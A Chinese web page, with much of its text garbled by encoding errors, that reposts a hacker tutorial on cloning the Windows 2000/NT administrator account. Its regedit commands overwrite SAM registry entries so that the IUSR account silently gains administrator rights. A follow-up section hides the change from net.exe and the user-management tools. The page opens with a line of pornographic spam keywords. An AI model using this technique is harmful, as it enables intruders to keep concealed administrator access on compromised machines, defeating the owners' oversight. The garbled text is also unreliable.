人妻丰满熟妇无码区乱com|久久婷婷午夜精品二区|一道本国产不卡视频|国产孕妇故爱A级高清片免费看

<tbody id="geoqw"></tbody>
  • <center id="geoqw"></center>
  • <menu id="geoqw"></menu>
  • <center id="geoqw"></center>
    
    <menu id="geoqw"></menu>
  • 克隆管理員帳號(hào)的方法

    時(shí)間:2022-10-10 04:39:54 電腦安全 我要投稿
    • 相關(guān)推薦

    克隆管理員帳號(hào)的方法大全

      經(jīng)?吹揭恍┤嗽谌肭忠慌_(tái)Windows 2000或者Windows NT后堂而皇之地創(chuàng)建一個(gè)管理員組的用戶,似乎當(dāng)管理員不存在一般,今天偶違背一下偶以前的初衷,Share一個(gè)類似于RootKit的玩藝,當(dāng)然,這些過(guò)程也是可以用腳本實(shí)現(xiàn)的,但是我就不寫了,OK,Show Time Now。

      首先要讓大家知道的概念是在Windows 2000和Windows NT里,默認(rèn)管理員帳號(hào)的SID是固定的500(0x1f4),那么我們可以用機(jī)器里已經(jīng)存在的一個(gè)帳號(hào)將SID為500的帳號(hào)進(jìn)行克隆,在這里我們選擇的帳號(hào)是IUSR_MachineName(當(dāng)然,為了加強(qiáng)隱蔽性,我們選擇了這個(gè)帳號(hào),所有用戶都可以用以下的方法,只不過(guò)這個(gè)用戶較常見(jiàn)罷了),測(cè)試環(huán)境為Windows 2000 Server。

      運(yùn)行一個(gè)System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用Http://www.sometips.com/soft/psu.exe),然后在該CMD Shell里面運(yùn)行

      regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4

      這樣我們將SID 為500的管理員帳號(hào)的相關(guān)信息導(dǎo)出,然后編輯adam.reg文件,將adam.reg文件的第三行--[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4]最后的'1F4'修改為IUSR_MachineName的SID(大部分的機(jī)器該用戶的SID都為0x3E9,如果機(jī)器在最初安裝的時(shí)候沒(méi)有安裝IIS,而自己創(chuàng)建了帳號(hào)后再安裝IIS就有可能不是這個(gè)值),將Root.reg文件中的'1F4'修改為'3E9'后執(zhí)行

      regedit /s adam.reg

      導(dǎo)入該Reg文件

      然后運(yùn)行

      net user IUSR_MachineName Sometips

      修改IUSR_MachineName的密碼(最好使用14位的密碼,越像IUSR_MachineName的密碼越好)

      OK,大功告成...

      這樣,我們擁有和默認(rèn)管理員一樣的桌面、一樣的Profile.....

      而且,當(dāng)我們運(yùn)行.net localgroup administrators 時(shí),看看結(jié)果:

      C:>net localgroup administrators

      Alias name administrators

      Comment Administrators have complete and unrestricted access to the computer/domain

      Members

      -------------------------------------------------------------------------------

      Administrator

      The command completed successfully.

      再看看USER2SID的輸出結(jié)果:

      C:>user2sid Administrator

      S-1-5-21-1004336348-1078145449-854245398-500

      Number of subauthorities is 5

      Domain is IDONTKNOW

      Length of SID in memory is 28 bytes

      Type of SID is SidTypeUser

      C:>user2sid iusr_machinename

      S-1-5-21-1004336348-1078145449-854245398-1001

      Number of subauthorities is 5

      Domain is IDONTKNOW

      Length of SID in memory is 28 bytes

      Type of SID is SidTypeUser

      我想,再高明的管理員也看不到任何的異狀了...而且,隨便管理員改成什么密碼,我照樣可以用IUSR_MachineName,密碼為Sometips登陸...(沒(méi)有哪位大俠級(jí)的管理員喜歡經(jīng)常修改IUSR_MachineName為其他的名字吧)

      ^_^,這算不算RootKit...

      附:

      1、感謝叮叮付出需要reinstall OS的代價(jià)...

      2、任何用以上方法進(jìn)行試驗(yàn)所導(dǎo)致的系統(tǒng)無(wú)法使用均與偶無(wú)關(guān),偶均不提供技術(shù)支持...

      -----------------------------------------------------------------------------

      叮叮 的補(bǔ)充完善

      很多人提到使用了管理工具的用戶管理后,能夠發(fā)現(xiàn)IUSR_MachineName被提升了權(quán)限。

      現(xiàn)給出解決辦法。

      方法同上,不過(guò)這次修改內(nèi)容多一些。即

      這次要導(dǎo)出兩個(gè)key內(nèi)容:

      一個(gè)是adam提到的

      regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4

      然后另外一個(gè)是你需要修改那個(gè)賬號(hào)的值

      regedit /e iusr.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersE9

      然后按照adam提到的修改adam.reg

      “將adam.reg文件的第三行--[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersF4]最后的'1F4'修改為IUSR_MachineName的SID”

      現(xiàn)在,你還要從iusr.reg文件中復(fù)制一下內(nèi)容

      就是將iusr.reg文件中“'V'=hex:0”開(kāi)始一直到iusr.reg文件結(jié)束部分復(fù)制下來(lái)

      然后替換掉adam.reg中同樣位置的部分

      最后使用

      regedit /s adam.reg

      導(dǎo)入該Reg文件

      呵呵,別忘了給這個(gè)IUSR_MachineName改密碼哦。

      hehe,ok,大功告成。

      現(xiàn)在IUSR_MachineName賬號(hào)擁有了管理員的權(quán)限,但是你使用net.exe和

      管理工具中的用戶管理都將看不到任何痕跡,即使你去察看所屬于的組和用戶。

      都和修改前沒(méi)有任何區(qū)別。

    【克隆管理員帳號(hào)的方法】相關(guān)文章:

    克隆的作文03-17

    克隆陽(yáng)光作文10-21

    克隆自己作文02-20

    克隆樹林作文10-14

    有關(guān)克隆的作文05-21

    有關(guān)克隆作文10-31

    克隆的煩惱作文01-15

    關(guān)于克隆的作文02-23

    家鄉(xiāng)的克隆果園作文10-28

    我要克隆作文02-06